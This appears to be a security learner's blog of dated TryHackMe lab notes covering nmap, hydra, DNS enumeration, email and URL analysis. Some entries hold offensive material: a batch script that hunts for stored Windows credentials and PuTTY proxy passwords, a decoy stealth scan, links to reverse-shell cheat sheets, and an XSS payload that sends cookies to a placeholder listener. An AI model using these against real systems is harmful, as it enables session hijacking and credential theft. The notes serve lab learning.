Wednesday, March 26, 2025
Monday, March 24, 2025
[tryhackme][Windows][unpatched]Check software version to find unpatched software
#wmic product get name,version,vendor
[tryhackme][Windows][Credential Restoration] Cred_Restoration.bat
@echo off
echo(
echo Showing significant files...
IF EXIST "C:\Unattend.xml" (
echo C:\Unattend.xml exists.
)
IF EXIST "C:\Windows\Panther\Unattend.xml" (
echo C:\Windows\Panther\Unattend.xml exists.
)
IF EXIST "C:\Windows\Panther\Unattend\Unattend.xml" (
echo C:\Windows\Panther\Unattend\Unattend.xml exists.
)
IF EXIST "C:\Windows\system32\sysprep.inf" (
echo C:\Windows\system32\sysprep.inf exists.
)
IF EXIST "C:\Windows\system32\sysprep\sysprep.xml" (
echo C:\Windows\system32\sysprep.inf exists.
)
IF EXIST "%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" (
echo %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt exists.
)
IF EXIST "C:\inetpub\wwwroot\web.config" (
echo C:\inetpub\wwwroot\web.config exists.
)
IF EXIST "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config" (
echo C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config exists.
)
echo(
echo Showing saved credentials on the system...
cmdkey /list
echo(
echo Show Putty Proxy passwords...
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Sunday, March 16, 2025
[tryhackme][nmap]Hidden NMAP Scan
#nmap -e tun0 -f -T1 -D 10.10.174.103,RND,10.10.174.104,RND,ME,RND,RND -Pn 10.10.174.2
Use Fragment, Low Rate and Decoy techniques to scan 10.10.174.2
Sunday, March 9, 2025
[hydra][brute force][tryhackme] THC Hydra parameters
-l username Provide the login name
-P WordList.txt Specify the password list (e.g. /usr/share/wordlists/rockyou.txt) to use
server service Set the server address and service to attack
-s PORT Use in case of non-default service port number
-V or -vV Show the username and password combinations being tried
-d Display debugging output if the verbose output is not helping
Saturday, March 8, 2025
[nmap][tryhackme] Nmap output parameters
-oN save output in normal format
-oG save output in grepable format
-oX save output in XML format
-oA save output in normal, XML and Grepable formats
Friday, March 7, 2025
[nmap][netcat][nc] Use Nmap to run a simple test verifying NIDPS effectiveness
Attacker Machine:
# nmap -sT -Pn --script all -p 80 VICTIM_IP_ADDRESS
Victim Machine:
# ncat -l -k -t -p 80
Tuesday, March 4, 2025
Verify the version of jQuery.UI through Firefox
Use Firefox to browse the URL, open "Web Developer Tools", go to "Console" tab, and run the command "jQuery.ui.version".
Thursday, February 20, 2025
[TryHackMe] Email Header Analysis
1. X-Originating-IP - The IP address of the email was sent from (this is known as an X-header)
2. Smtp.mailfrom/header.from - The domain the email was sent from (these headers are within Authentication-Results)
3. Reply-To - Instead of replying the From email address, this is the email address specific to receiving replying emails
Reference: https://web.archive.org/web/20221219232959/https://mediatemple.net/community/products/all/204643950/understanding-an-email-header
Wednesday, February 19, 2025
[TryHackMe] URL Shortener
[TryHackMe] URL Shortener
Common URL Shorteners are shown as follows.
bit.ly
goo.gl
ow.ly
s.id
smarturl.it
tiny.pl
tinyurl.com
x.co
Append "+" to the shortened URL to see the original URL.
[TryHackMe] Punycode
Example:
What you saw in the URL above is adıdas.de which has the Punycode of http://xn--addas-o4a.de/
Tool:
Punycode can be inserted through Microsoft Word.
Punycode translator:
https://www.punycoder.com/
Sunday, February 16, 2025
[TryHackMe] IOC Search
https://metadefender.com/
https://talosintelligence.com/
https://www.virustotal.com/gui/home/upload
https://intelligence.any.run/analysis/lookup
https://bazaar.abuse.ch/browse/
https://malshare.com/search.php
PS: Obtain SHA256 under Windows
#CertUtil -hashfile [FILENAME] SHA256
[TryHackMe] Shellcode/Payload
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/danielmiessler/SecLists
Thursday, February 13, 2025
Tuesday, February 11, 2025
Friday, February 7, 2025
[TryHackMe] Cookie Hijacking through XSS
XSS Payload:
</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
Listening side:
#nc -nvlp PORT_NUMBER
Thursday, January 23, 2025
[Powershell] A script to listen a given TCP port
# Manually execute "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process"
# Name this file as Listen-TCP.ps1
param (
[int]$Port = 8080 # Default port is 8080, you can specify another port when running the script
)
$gsock = {
# Create a TCP listener on the specified port
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.Start()
Write-Host "Listening on port $Port..."
try {
while ($true) {
# Accept a client connection
$client = $listener.AcceptTcpClient()
Write-Host "Client connected!"
# Get the network stream for reading data
$stream = $client.GetStream()
# Set up a reader to read from the stream
$reader = New-Object System.IO.StreamReader($stream)
# Read the data from the stream
while ($reader.Peek()) {
$data = $reader.ReadLine()
Write-Host "Received: $data"
}
# Close the client connection
$reader.Close()
$client.Close()
}
}
catch {
Write-Host "Error: $_"
}
finally {
# Stop the listener when done
$listener.Stop()
Write-Host "Listener stopped."
.$gsock
}
}
&$gsock
# .\Listen-TCP.ps1 -Port 9090
Tuesday, January 21, 2025
[TryHackMe] DNS Enumeration
1) CA's Certificate Transparency logs
Use https://crt.sh/ to search the domain.
2) Google Hacking
Utilize the keywords, "site" and "inurl".
3) Employing the tool, dnsrecon
# dnsrecon -t brt -d DOMAIN
4) Employing another tool, sublist3r.py
# sublist3r.py -d DOMAIN
5) Leveraging Virtual Host through the tool, ffuf
# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u http://IP
Subscribe to:
Posts (Atom)